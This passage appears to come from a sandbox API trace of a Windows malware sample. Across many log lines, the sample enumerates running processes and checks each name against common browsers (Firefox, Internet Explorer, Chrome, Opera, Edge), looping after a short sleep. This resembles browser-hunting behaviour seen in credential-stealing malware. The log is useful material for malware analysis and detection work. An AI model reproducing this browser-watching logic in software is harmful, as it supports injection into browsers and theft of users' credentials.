lpString2="firefox.exe") returned 1 [0194.217] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0194.217] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0194.217] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0194.217] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0194.218] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0194.218] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0194.218] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0194.218] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0194.218] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.218] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0194.219] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0194.219] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0194.219] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0194.219] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0194.219] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0194.219] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0194.219] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0194.219] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0194.219] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0194.219] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0194.220] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0194.220] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0194.220] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0194.220] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0194.220] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.220] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0194.220] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0194.220] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0194.220] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0194.220] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0194.221] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0194.221] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0194.221] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0194.221] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0194.221] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0194.221] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0194.222] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0194.222] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0194.222] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0194.222] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0194.222] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0194.222] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0194.222] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0194.222] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0194.222] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0194.222] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0194.223] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0194.223] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0194.223] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0194.223] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0194.223] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.223] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0194.223] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0194.223] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0194.223] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0194.223] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0194.223] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.224] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0194.224] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0194.224] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0194.224] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0194.224] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0194.224] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.224] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0194.225] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0194.225] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0194.225] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0194.225] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0194.225] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.225] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0194.225] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0194.225] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0194.225] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0194.225] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0194.225] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.225] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0194.226] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0194.226] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0194.226] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0194.226] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0194.226] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.226] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.226] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0194.226] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0194.226] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0194.226] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0194.226] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.226] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.227] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.227] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.227] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.227] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.227] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.227] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0194.228] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0194.228] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0194.228] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0194.228] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0194.228] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.228] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.228] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.228] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.228] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.228] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.228] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.228] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.229] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0194.229] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0194.229] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0194.229] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0194.229] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.229] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.229] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.229] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.229] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.229] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.229] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.230] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.230] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.230] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.230] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.230] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0194.230] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.230] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.231] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0194.231] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0194.231] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0194.231] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0194.231] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.231] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.231] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0194.231] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0194.231] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0194.231] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0194.231] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.231] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.232] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0194.232] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.233] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.233] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.233] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.233] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.233] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0194.233] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.233] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.234] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.234] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.234] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.234] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0194.234] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.234] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0194.234] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0194.234] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0194.234] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0194.234] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0194.234] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0194.234] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0194.235] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0194.235] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0194.235] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0194.235] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0194.235] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.235] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0194.235] CloseHandle (hObject=0xe8) returned 1 [0194.235] Sleep (dwMilliseconds=0x3e8) [0195.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0195.263] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.263] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0195.263] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0195.263] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0195.263] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0195.263] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0195.263] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.264] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0195.264] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0195.264] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0195.264] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0195.264] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0195.264] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.264] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0195.264] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0195.264] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0195.264] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0195.264] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.264] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.265] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0195.265] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0195.265] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0195.265] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0195.265] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.265] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.266] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0195.266] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0195.266] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0195.266] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0195.266] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.266] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0195.266] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0195.266] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0195.266] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0195.266] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.267] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0195.267] 